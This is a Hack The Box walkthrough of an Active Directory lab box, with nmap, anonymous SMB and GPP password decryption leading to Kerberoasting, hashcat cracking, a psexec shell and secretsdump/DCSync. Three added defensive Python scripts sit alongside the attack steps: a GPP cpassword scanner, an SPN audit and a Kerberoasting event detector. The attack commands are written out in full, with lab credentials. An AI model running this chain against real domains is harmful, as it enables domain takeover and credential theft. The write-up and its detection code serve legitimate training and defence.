Educational | Intermediate | 4 min read

HTB: Active Directory Lab (Intermediate)

An intermediate walkthrough covering Active Directory enumeration, Kerberoasting, and domain privilege escalation techniques.

Tags: Hack The Box, CTF, Active Directory, Kerberos, intermediate


Active Directory environments are everywhere in corporate networks. This walkthrough covers essential AD attack techniques through a Hack The Box machine.

Box Information

  • Name: Active (example AD box)
  • OS: Windows Server
  • Difficulty: Medium
  • Skills: AD enumeration, SMB, Kerberoasting, Group Policy abuse

Initial Reconnaissance

Nmap Scan

nmap -sC -sV -p- -oA nmap/active 10.10.10.100

Results:

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows AD LDAP
445/tcp   open  microsoft-ds  Windows Server 2008 R2
464/tcp   open  kpasswd5
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          AD Global Catalog
3269/tcp  open  tcpwrapped

Kerberos (88), LDAP (389/636), the Global Catalog (3268/3269) and DNS on one host mark this as a Domain Controller.

SMB Enumeration

Anonymous Access

smbclient -L //10.10.10.100 -N
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share
Replication     Disk      
SYSVOL          Disk      Logon server share
Users           Disk

Replication Share

The Replication share allows anonymous access:

smbclient //10.10.10.100/Replication -N

Exploring the share reveals a Groups.xml file in a GPP directory.

Group Policy Preferences (GPP) Attack

Finding GPP Passwords

get active.htb/Policies/{...}/MACHINE/Preferences/Groups/Groups.xml

Contents:

<Groups>
  <User name="active.htb\SVC_TGS" 
        cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" />
</Groups>

Decrypting GPP Password

Microsoft published the static AES key used to encrypt GPP cpassword values in its own documentation, so any cpassword readable from SYSVOL can be decrypted:

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

Output: GPPstillStandingStrong2k18

We now have credentials: SVC_TGS:GPPstillStandingStrong2k18
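A defender's counterpart to the step above, added here as an example and not part of the original walkthrough or of gpp-decrypt: a small Python scanner that walks a local copy of SYSVOL and reports every GPP preference file that still carries a cpassword attribute, without decrypting anything. The sample document is constructed to mirror the Groups.xml shown above; the set of file names and the handling of both layouts (cpassword on the item element, as above, or on a nested Properties element, as production files do) are the example's own assumptions.

```python
import os
import sys
import xml.etree.ElementTree as ET
from typing import List, Tuple

# GPP preference files known to carry a cpassword attribute (assumed list).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Constructed sample that mirrors the Groups.xml shown in the walkthrough.
SAMPLE_GROUPS_XML = """<Groups>
  <User name="active.htb\\SVC_TGS"
        cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" />
</Groups>"""

Finding = Tuple[str, str, str, str]  # (source, element, account name, cpassword)


def find_cpasswords(xml_text: str, source: str = "<memory>") -> List[Finding]:
    """Return one finding per element carrying a non-empty cpassword attribute.

    Production GPP files put cpassword on a nested <Properties> element and the
    display name on its parent (<User>, <Service>, ...); the sample above puts
    both on <User>. Both layouts are handled.
    """
    findings: List[Finding] = []
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return findings  # unparseable file: report nothing rather than abort the sweep
    parent_of = {child: parent for parent in root.iter() for child in parent}
    for elem in root.iter():
        cpass = elem.attrib.get("cpassword", "")
        if not cpass:
            continue
        owner = parent_of.get(elem, elem) if elem.tag == "Properties" else elem
        name = (elem.attrib.get("userName") or elem.attrib.get("accountName")
                or owner.attrib.get("name") or "")
        findings.append((source, owner.tag, name, cpass))
    return findings


def scan_sysvol(root_dir: str) -> List[Finding]:
    """Walk a SYSVOL copy and check every GPP preference file it contains."""
    findings: List[Finding] = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for fname in files:
            if fname not in GPP_FILES:
                continue
            path = os.path.join(dirpath, fname)
            # GPP files are usually UTF-8 with a BOM; utf-8-sig strips it for the parser.
            with open(path, "r", encoding="utf-8-sig", errors="replace") as fh:
                findings.extend(find_cpasswords(fh.read(), path))
    return findings


if __name__ == "__main__":
    # Usage: python gpp_scan.py /path/to/sysvol   (no argument: run on the sample)
    results = (scan_sysvol(sys.argv[1]) if len(sys.argv) > 1
               else find_cpasswords(SAMPLE_GROUPS_XML, "sample Groups.xml"))
    for source, element, name, cpass in results:
        print(f"{source}: <{element}> {name!r} carries a cpassword "
              f"({len(cpass)} chars); delete the preference item and rotate the account")
    sys.exit(1 if results else 0)
```

Run it against a mounted or copied SYSVOL; a non-zero exit code makes it usable as a scheduled check. Deleting the preference item is only half the fix: the password has been readable by every domain user, so the account it belongs to must be rotated as well.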

Domain Enumeration

Validating Credentials

crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'

Success! The credentials are valid.

LDAP Enumeration

ldapsearch -x -H ldap://10.10.10.100 -D "SVC_TGS@active.htb" -w 'GPPstillStandingStrong2k18' -b "DC=active,DC=htb"

The result lists every object under the domain base; go through it for users, groups, and service accounts.

BloodHound Collection

bloodhound-python -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -d active.htb -dc dc.active.htb -c all

Import into BloodHound to visualize attack paths.

Kerberoasting

Identifying SPNs

Any domain user account that has a Service Principal Name (SPN) can be Kerberoasted, because every authenticated user may request a service ticket for it:

GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100

Output:

ServicePrincipalName  Name           MemberOf
--------------------  ----           --------
active/CIFS:445       Administrator  Domain Admins

The Administrator account has an SPN!
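An SPN on a privileged user account is exactly what a periodic SPN audit (see the defender notes at the end) should catch before an attacker does. The following is an added example, not from the walkthrough or from any Impacket tool: it parses the LDIF that ldapsearch prints and reports every user account with an SPN, together with its privileged group memberships and password age. The LDIF excerpt, the privileged-group list and the pwdLastSet values are constructed for the example.

```python
import base64
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional

# Groups whose members should never be Kerberoastable (assumed list; extend per domain).
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators",
                     "Schema Admins", "Account Operators", "Backup Operators"}

# Constructed excerpt in the layout ldapsearch -x prints (LDIF). Only the
# Administrator entry carries an SPN; DC$ is a computer account and is skipped.
SAMPLE_LDIF = """\
# extended LDIF
dn: CN=Administrator,CN=Users,DC=active,DC=htb
sAMAccountName: Administrator
memberOf: CN=Domain Admins,CN=Users,DC=active,DC=htb
memberOf: CN=Enterprise Admins,CN=Users,DC=active,DC=htb
servicePrincipalName: active/CIFS:445
pwdLastSet: 131773802660000000

dn: CN=SVC_TGS,CN=Users,DC=active,DC=htb
sAMAccountName: SVC_TGS
memberOf: CN=Domain Users,CN=Users,DC=active,DC=htb
pwdLastSet: 131773802660000000

dn: CN=DC,OU=Domain Controllers,DC=active,DC=htb
sAMAccountName: DC$
servicePrincipalName: HOST/dc.active.htb
servicePrincipalName: ldap/dc.active.htb

# search result
search: 2
result: 0 Success
"""

Entry = Dict[str, List[str]]


def _unfold(text: str) -> List[str]:
    """LDIF wraps long values onto following lines that start with one space."""
    lines: List[str] = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_ldif(text: str) -> List[Entry]:
    """Parse LDIF into one {attribute: [values]} dict per dn."""
    entries: List[Entry] = []
    current: Optional[Entry] = None
    for line in _unfold(text):
        if line.startswith("#"):
            continue
        if line == "":                      # blank line ends an entry
            if current:
                entries.append(current)
            current = None
            continue
        attr, sep, value = line.partition(":")
        if not sep:
            continue
        if value.startswith(":"):           # "attr:: <base64>"
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        if current is None:
            if attr != "dn":                # trailer lines such as "search: 2" / "result: 0 Success"
                continue
            current = {}
        current.setdefault(attr, []).append(value)
    if current:
        entries.append(current)
    return entries


FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(filetime: str) -> datetime:
    """pwdLastSet is a Windows FILETIME: 100 ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=int(filetime) // 10)


def password_age_days(filetime: str, now: Optional[datetime] = None) -> Optional[int]:
    if int(filetime) == 0:                  # never set / must change at next logon
        return None
    now = now or datetime.now(timezone.utc)
    return (now - filetime_to_datetime(filetime)).days


def audit_spns(entries: List[Entry], now: Optional[datetime] = None) -> List[Dict]:
    """Report every user account with an SPN and what makes it a bad target."""
    findings = []
    for e in entries:
        spns = e.get("servicePrincipalName", [])
        sam = e.get("sAMAccountName", [""])[0]
        if not spns or sam.endswith("$"):   # computer accounts: SPNs by design, random passwords
            continue
        groups = [dn.split(",")[0][3:] for dn in e.get("memberOf", [])]   # "CN=X,..." -> "X"
        findings.append({
            "account": sam,
            "spns": spns,
            "privileged_groups": sorted(g for g in groups if g in PRIVILEGED_GROUPS),
            "password_age_days": password_age_days(e.get("pwdLastSet", ["0"])[0], now),
        })
    return findings


if __name__ == "__main__":
    for f in audit_spns(parse_ldif(SAMPLE_LDIF)):
        print(f"{f['account']}: SPNs={f['spns']} privileged={f['privileged_groups']} "
              f"password_age_days={f['password_age_days']}")
```

Feed it the output of the ldapsearch command from the Domain Enumeration section (piped to a file) and act on anything it prints: an SPN on a privileged account should be moved to a dedicated service account or a gMSA, and a long-lived password on any SPN-bearing account is a cracking target.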

Requesting TGS

GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

This returns a Kerberos TGS (service ticket) encrypted with a key derived from the service account's password hash, so it can be cracked offline without touching the DC again.
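On the DC, each such request leaves Security event 4769 (a Kerberos service ticket was requested). The following is an added detection example, not part of the walkthrough: it runs over constructed 4769 records (field names shortened: Account Name, Service Name, Ticket Encryption Type, Client Address) and flags a requester that pulls tickets for several distinct user SPN accounts in a short window, any ticket for a honeytoken SPN account (the honeytoken idea from the defender notes at the end), and, where the domain is AES-only, RC4 (0x17) tickets for user SPNs. The event shape, the thresholds and the svc_honey account name are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List

RC4_HMAC = "0x17"            # 4769 "Ticket Encryption Type" of a classic Kerberoast request
WINDOW = timedelta(minutes=5)
MIN_DISTINCT = 3             # distinct user SPN accounts from one requester inside WINDOW

# Constructed 4769 events (field names shortened from the Windows event):
#   account = Account Name, service = Service Name, enc_type = Ticket Encryption Type
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"time": "2024-05-01T09:12:00", "account": "jdoe@ACTIVE.HTB", "service": "DC$",
     "enc_type": "0x12", "client_ip": "10.10.10.50"},
    {"time": "2024-05-01T09:12:05", "account": "jdoe@ACTIVE.HTB", "service": "svc_sql",
     "enc_type": "0x12", "client_ip": "10.10.10.50"},
    {"time": "2024-05-01T10:00:01", "account": "SVC_TGS@ACTIVE.HTB", "service": "Administrator",
     "enc_type": "0x17", "client_ip": "10.10.14.5"},
    {"time": "2024-05-01T10:00:02", "account": "SVC_TGS@ACTIVE.HTB", "service": "svc_sql",
     "enc_type": "0x17", "client_ip": "10.10.14.5"},
    {"time": "2024-05-01T10:00:02", "account": "SVC_TGS@ACTIVE.HTB", "service": "svc_backup",
     "enc_type": "0x17", "client_ip": "10.10.14.5"},
    {"time": "2024-05-01T11:30:00", "account": "jsmith@ACTIVE.HTB", "service": "svc_honey",
     "enc_type": "0x12", "client_ip": "10.10.10.77"},
]


def is_user_service(service: str) -> bool:
    """Computer accounts end in '$' and krbtgt tickets are TGTs; neither is a Kerberoast target."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def detect_kerberoasting(events: Iterable[Dict[str, str]], honeytokens: Iterable[str] = (),
                         rc4_expected: bool = True) -> List[Dict]:
    """Alerts for (a) any ticket for a honeytoken SPN account, (b) RC4 tickets for user
    SPNs when the domain is AES-only (rc4_expected=False), (c) one requester pulling
    tickets for MIN_DISTINCT or more different user SPN accounts inside WINDOW."""
    alerts: List[Dict] = []
    honey = {h.lower() for h in honeytokens}
    per_requester: Dict[str, List] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        service = ev["service"]
        if not is_user_service(service):
            continue
        if service.lower() in honey:
            alerts.append({"rule": "honeytoken_spn", "requester": ev["account"], "service": service,
                           "client_ip": ev.get("client_ip"), "time": ev["time"]})
        if not rc4_expected and ev.get("enc_type") == RC4_HMAC:
            alerts.append({"rule": "rc4_downgrade", "requester": ev["account"], "service": service,
                           "client_ip": ev.get("client_ip"), "time": ev["time"]})
        per_requester[ev["account"]].append(
            (datetime.fromisoformat(ev["time"]), service, ev.get("client_ip")))
    for requester, reqs in per_requester.items():
        for i, (start, _svc, ip) in enumerate(reqs):       # sliding window; first hit is enough
            in_window = {svc for ts, svc, _ in reqs[i:] if ts - start <= WINDOW}
            if len(in_window) >= MIN_DISTINCT:
                alerts.append({"rule": "spn_sweep", "requester": requester, "client_ip": ip,
                               "services": sorted(in_window), "time": start.isoformat()})
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoasting(SAMPLE_EVENTS, honeytokens=["svc_honey"]):
        print(alert)
```

On a Windows Server 2008 R2 domain like this one, RC4 is the normal ticket type, so the RC4 rule stays off (rc4_expected=True) and the sweep and honeytoken rules carry the detection; once a domain enforces AES for service accounts, a 0x17 ticket for a user SPN becomes a strong signal on its own.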

Cracking the Hash

Save the hash to a file and crack with hashcat:

hashcat -m 13100 tgs_hash.txt /usr/share/wordlists/rockyou.txt

Cracked: Ticketmaster1968

Domain Admin Access

Verifying Admin Credentials

crackmapexec smb 10.10.10.100 -u 'Administrator' -p 'Ticketmaster1968'

Output shows (Pwn3d!) - we have admin!

Getting a Shell

psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100

We now have a SYSTEM shell on the Domain Controller.

Post-Exploitation

Dumping Hashes

secretsdump.py active.htb/Administrator:Ticketmaster1968@10.10.10.100

This dumps:

  • NTLM hashes
  • Kerberos keys
  • Cached credentials
  • LSA secrets

DCSync Attack

With Domain Admin privileges, we can perform DCSync:

secretsdump.py -just-dc active.htb/Administrator:Ticketmaster1968@10.10.10.100

Flags

type C:\Users\SVC_TGS\Desktop\user.txt
type C:\Users\Administrator\Desktop\root.txt

Attack Chain Summary

  1. Anonymous SMB access → Found Replication share
  2. GPP password → Decrypted to get SVC_TGS credentials
  3. Kerberoasting → Obtained Administrator TGS
  4. Password cracking → Recovered Administrator password
  5. Domain Admin → Full domain compromise

Lessons Learned

For Penetration Testers

  • Always check for anonymous SMB access
  • GPP passwords are still common in older environments
  • Kerberoasting is highly effective against weak passwords
  • BloodHound is essential for AD assessments

For Defenders

  • Remove GPP passwords from SYSVOL immediately
  • Implement strong password policies for service accounts
  • Use gMSA for service accounts where possible
  • Regularly audit SPNs
  • Deploy honeytokens for detection

Tools Used

  • nmap
  • smbclient
  • gpp-decrypt
  • Impacket (GetUserSPNs, secretsdump, psexec)
  • hashcat
  • BloodHound
  • crackmapexec

Want to learn Active Directory penetration testing? Contact us: m1k3@msquarellc.net
